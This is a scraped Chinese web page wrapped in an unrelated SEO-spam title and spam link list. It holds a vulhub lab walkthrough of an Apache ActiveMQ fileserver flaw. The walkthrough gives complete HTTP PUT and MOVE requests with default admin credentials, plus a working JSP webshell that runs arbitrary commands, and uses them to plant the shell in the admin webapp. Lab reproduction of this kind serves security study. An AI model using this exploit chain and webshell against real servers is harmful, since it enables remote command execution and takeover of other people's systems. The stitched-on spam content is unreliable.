当前位置: 首页 > news >正文

兰州网站搜索优化wordpress class

news 2026/5/6 10:15:14
兰州网站搜索优化,wordpress class,泵 品牌网站建设,朝阳网站推广一.环境配置 腾讯云的ubuntu操作系统#xff0c;已经安装有docker 和 vulhub 直接来到 启动环境docker-compose#xff0c;要在root权限下运行。 docker-compose up -d 若出现等待时间过长的情况#xff0c;请参考这篇文章http://t.csdnimg.cn/SYhbE 访问http://公网ip:8…一.环境配置 腾讯云的ubuntu操作系统已经安装有docker 和 vulhub 直接来到 启动环境docker-compose要在root权限下运行。 docker-compose up -d 若出现等待时间过长的情况请参考这篇文章http://t.csdnimg.cn/SYhbE 访问http://公网ip:8161 若访问成功则环境搭建成功。 二.漏洞复现 目录拼接admin进行登录操作。默认账户密码为admin/admin。 访问以下目录找到文件上传的地址。 http://公网ip:8161/admin/test/systemProperties.jsp 随便抓一个页面的包我这里就抓刚刚查询目录那个页面的包。 写入webshell文件。 将报文转发到Repeater。 进入Repeater中的Header模块修改报文第一行并在报文最后添加木马。 返回Repeater中的Raw模块点击Go发送报文。 PUT /fileserver/1.jsp HTTP/1.1 Host: 公网ip:8161 Cache-Control: max-age0 Authorization: Basic YWRtaW46YWRtaW4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 Cookie: JSESSIONIDrveyn…………………… Connection: close% page importjava.io.* % % try { String cmd request.getParameter(cmd); Process child Runtime.getRuntime().exec(cmd); InputStream in child.getInputStream(); int c; while ((c in.read()) ! -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } % 上传成功。 访问http://公网ip:8161/fileserver/1.jsp 发现上传成功但没有解析 ActiveMQ Web控制台分为三个应用程序adminapi和fileserver其中admin是管理员页面api是界面fileserver是用于存储文件的界面admin和api需要先登录才能使用fileserver不需要登录。 利用MOVE将木马文件移动到api或者admin我这边是移动到了admin目录下 还是刚刚的报文更该第一行和增加第三行。第三行的路径就是最开始查询到的目录。 MOVE /fileserver/1.jsp HTTP/1.1 Host: 公网ip:8161 Destination:file:///opt/activemq/webapps/admin/1.jsp Cache-Control: max-age0 Authorization: Basic YWRtaW46YWRtaW4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 Cookie: JSESSIONIDyts9…………………… Connection: close Content-Length: 397% page importjava.io.* % % try { String cmd request.getParameter(cmd); Process child Runtime.getRuntime().exec(cmd); InputStream in child.getInputStream(); int c; while ((c in.read()) ! -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } % 访问文件http://公网ip:8161/admin/1.jsp?cmdls 执行命令whoami 漏洞复现完成。
http://www.hkea.cn/news/14553624/

相关文章:

  • 使用wordpress搭建手机网站wordpress语言更换
  • 工信部网站备案查不到企业如何创建网站
  • top后缀做网站好不好做金融资讯用什么网站程序
  • 市桥做网站访问国外网站很慢
  • 思源黑体做网站潍坊网站制作人才招聘
  • 网站建设及域名申请 厦门数据中心idc机房建设
  • 搬家网站怎么做凡科网做网站要钱吗
  • 找人建网站设计一个电子商务网站建设方案
  • 成都网站wordpress 搭建教程 pdf
  • dede可以做商城网站吗网站建设优势
  • 镇平网站建设防火墙放行图片域名
  • wordpress文件下载站同城网
  • 百度网站关键词wordpress后台反应慢
  • 企业网站开发哪家好wordpress商品导出淘宝
  • 怎么做整蛊网站老实人做网站
  • 罗湖做网站免费空间申请free
  • 合肥建设银行网站首页简单网站建设运营
  • 企业 网站 程序建立网上商城应考虑哪些问题
  • 淘宝做网站 评价话语塑胶原料东莞网站建设
  • 电子商务网站建设 市场分析美剧网站怎么做
  • 网站备案号几位数字 沪网站策划名词解释
  • 网站模板的制作怎么做的工程设计东莞网站建设技术支持
  • 网站怎么可以做视频播放抖音代运营合同注意事项
  • 物流公司名字浙江网站建设优化
  • 上海要做网站奉贤做网站价格
  • 吴川网站建设wordpress 添加友情链接
  • 研发网站要多久网站设计制作费用多少
  • 网站的注册广州网站建设案例
  • 58做网站吗中国今天新闻最新消息
  • seo 网站优化推广排名教程建立网站要钱吗?